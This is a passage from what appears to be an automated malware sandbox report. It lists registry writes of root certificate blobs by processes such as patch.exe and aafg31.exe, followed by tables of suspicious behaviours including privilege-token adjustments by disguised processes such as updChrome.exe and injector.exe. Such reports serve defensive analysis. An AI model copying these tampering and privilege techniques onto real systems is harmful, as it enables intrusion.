520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 aafg31.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 aafg31.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 aafg31.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 aafg31.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 aafg31.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 aafg31.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1704 toolspub2.exe 1704 toolspub2.exe 924 updChrome.exe 1280 Explorer.EXE 2040 updChrome.exe 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1248 3eef203fb515bda85f514e168abb5973.exe 1312 updChrome.exe 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1580 3eef203fb515bda85f514e168abb5973.exe 1580 3eef203fb515bda85f514e168abb5973.exe 1580 3eef203fb515bda85f514e168abb5973.exe 1580 3eef203fb515bda85f514e168abb5973.exe 1580 3eef203fb515bda85f514e168abb5973.exe 1280 Explorer.EXE 680 XandETC.exe 680 XandETC.exe 2252 powershell.exe 1280 Explorer.EXE 1280 Explorer.EXE 1564 AppLaunch.exe 916 AppLaunch.exe 1564 AppLaunch.exe 1280 Explorer.EXE 916 AppLaunch.exe 680 XandETC.exe 680 XandETC.exe 680 XandETC.exe 680 XandETC.exe 680 XandETC.exe 680 XandETC.exe 1280 Explorer.EXE 2592 powershell.exe 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 680 XandETC.exe 680 XandETC.exe 3036 powershell.exe 1280 Explorer.EXE 2808 AppLaunch.exe 2808 AppLaunch.exe 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 2560 injector.exe 1280 Explorer.EXE 1280 Explorer.EXE 1280 Explorer.EXE 2560 injector.exe 1280 Explorer.EXE 1280 Explorer.EXE 2560 injector.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1280 Explorer.EXE -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 460 Process not Found 460 Process not Found 460 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1704 toolspub2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 856 updEdge.exe Token: SeDebugPrivilege 1248 3eef203fb515bda85f514e168abb5973.exe Token: SeImpersonatePrivilege 1248 3eef203fb515bda85f514e168abb5973.exe Token: SeDebugPrivilege 1416 updEdge.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 1564 AppLaunch.exe Token: SeDebugPrivilege 916 AppLaunch.exe Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 480 updEdge.exe Token: SeShutdownPrivilege 2800 powercfg.exe Token: SeShutdownPrivilege 2924 powercfg.exe Token: SeShutdownPrivilege 2940 powercfg.exe Token: SeShutdownPrivilege 2980 powercfg.exe Token: SeDebugPrivilege 3036 powershell.exe Token: SeSystemEnvironmentPrivilege 2332 csrss.exe Token: SeDebugPrivilege 2808 AppLaunch.exe Token: SeDebugPrivilege 2788 powershell.exe Token: SeShutdownPrivilege 2668 powercfg.exe Token: SeShutdownPrivilege 2252 powercfg.exe Token: SeDebugPrivilege 2956 powershell.exe Token: SeShutdownPrivilege 2596 powercfg.exe Token: SeShutdownPrivilege 680 powercfg.exe Token: SeDebugPrivilege 2120 powershell.exe Token: SeShutdownPrivilege 2148 powercfg.exe Token: SeShutdownPrivilege 2512 powercfg.exe Token: SeDebugPrivilege 3060 powershell.exe Token: 